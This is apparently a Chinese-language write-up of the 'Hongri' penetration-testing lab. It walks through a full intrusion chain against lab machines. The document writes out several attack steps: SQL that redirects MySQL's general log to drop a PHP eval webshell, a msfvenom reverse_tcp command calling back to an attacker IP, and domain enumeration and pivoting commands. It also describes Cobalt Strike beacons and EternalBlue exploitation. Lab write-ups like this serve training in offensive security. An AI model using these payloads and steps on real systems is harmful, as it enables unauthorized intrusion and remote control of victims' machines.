红日靶场一

网络配置

Kali网络配置:

Win7网络配置:

Win2003和Win2008网络配置:

信息收集过程

先用kali扫描同网段IP,获取目标机的ip

获取目标主机ip之后,扫描端口号,探测目标开启的服务

可以看到开放了80端口,http服务,尝试访问web服务

信息收集之目录扫描,使用御剑工具扫描目录

发现使用的是phpmyadmin进行php管理,访问后台页面

phpmyadmin后台默认登陆账号密码为root/root,尝试登陆后台

登陆成功

漏洞发现过程

Phpmyadmin后台可以进行sql语句的执行操作,思路尝试利用sql语句写入一句话木马

先查看网站的路径信息,select @@basedir;

说明这个就是用phpstduy搭建的一个web应用。

网站路径为/phpStudy/WWW

然后查看当前用户的写权限 show variables like “secure_file_priv”;

发现对应的值为空,不允许导入和导出操作

换个思路,尝试将木马写入日志文件中,先查看mysql的日志文件配置

show variables like “%log%”;

第一个配置是代表是否开启了日志功能,第二个日志文件的存放位置

所以,可以将第一个配置更改为”On”,第二个配置的文件目录改为一个php文件,用来解析我们的一句话木马

1
Set global general_log=”on”;

1
Set global general_log_file=”C:/phpStudy/WWW/shell.php”;

查看一下更改结果

1
show variables like “%log%”;

写入一句话木马,因为不允许写操作,所以会产生报错信息

但是根据我们的修改,保存信息会存放在日志信息中,并且当作php解析,完成了木马的写入

1
Select ‘<?php eval($_POST[attack]);?>’;

木马写入成功后,访问文件,然后使用蚁剑链接

在phpmyadmin界面可以看到一个xycms的数据库,猜测可能存在一个xycms的网站

尝试访问该web应用

站内进行信息收集过程,可以看在公告信息处看到默认的后台地址与账号密码

尝试登陆后台

在后台搜寻漏洞点,在前台模块板块找到文件上传点,尝试写入一句话木马

文件上传成功,但是这个文件路径未知,需要寻找文件的保存路径

之前用御剑扫描得到过一个备份文件

我们可以根据备份文件确定目录结构

查看文件目录结构

这个目录就是刚才上传木马的地方

访问文件之后,使用蚁剑链接

使用CS上线目标靶机

启动服务端

启动客户端

在cs中添加监听器

生成CS木马程序

通过蚁剑上传木马程序

上线主机

渗透阶段

利用msf反弹shell,建立与攻击机的链接

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.18.1.129 LPORT=1235 -f exe >shell.exe

通过蚁剑,将木马放到目标主机上

Kali利用msf开启监听端口(use exploit/multi/handler)

设置好对应参数,直接run

发现链接不上,重新设置payload

设置新的payload(set payload windows/meterpreter/reverse_tcp)

Run一下就能连上了

chcp 65001解决乱码

查看目标主机网卡信息,获取内网ip:192.168.52.143

靶机信息收集

查看域内所有用户列表

1
net group /domain

查看域成员计算机列表

1
net group “domain computers” /domain

查看域管理员用户

1
net group “domain admins” /domain

查看防火墙信息

1
netsh firewall show state

提权到system

域内横向渗透

用msf直接搭建sock隧道

设置路由信息

1
run post/multi/manage/autoroute

查看路由

1
run autoroute -p

退到上层,使用socks4a进行代理

配置proxychains,保持和socks4a一致

配置成功,界面如下

内网信息收集

切换session,进入之前的session

先利用msf得到的shell,观察内网存活主机个数

一台存活主机为192.168.52.138,另一台存活主机为192.168.52.141

对两台主机进行扫描,使用一些常见漏洞端口

发现主机192.168.52.138开启了445端口,可能存在永恒之蓝漏洞

然后测试192.168.52.141,同样开放了445端口

漏洞利用

确定是否存在永恒之蓝漏洞

发现都存在永恒之蓝漏洞

尝试攻击执行rce

192.168.52.138执行whoami

192.168.52.141执行whoami

存在的问题及解决办法

msf生成的payload需要设为为32位,否则链接不稳定,没有办法getsystem

msf使用监听模块时,也需要将监听模块的payload设置和木马生成payload一致,否则会连接不上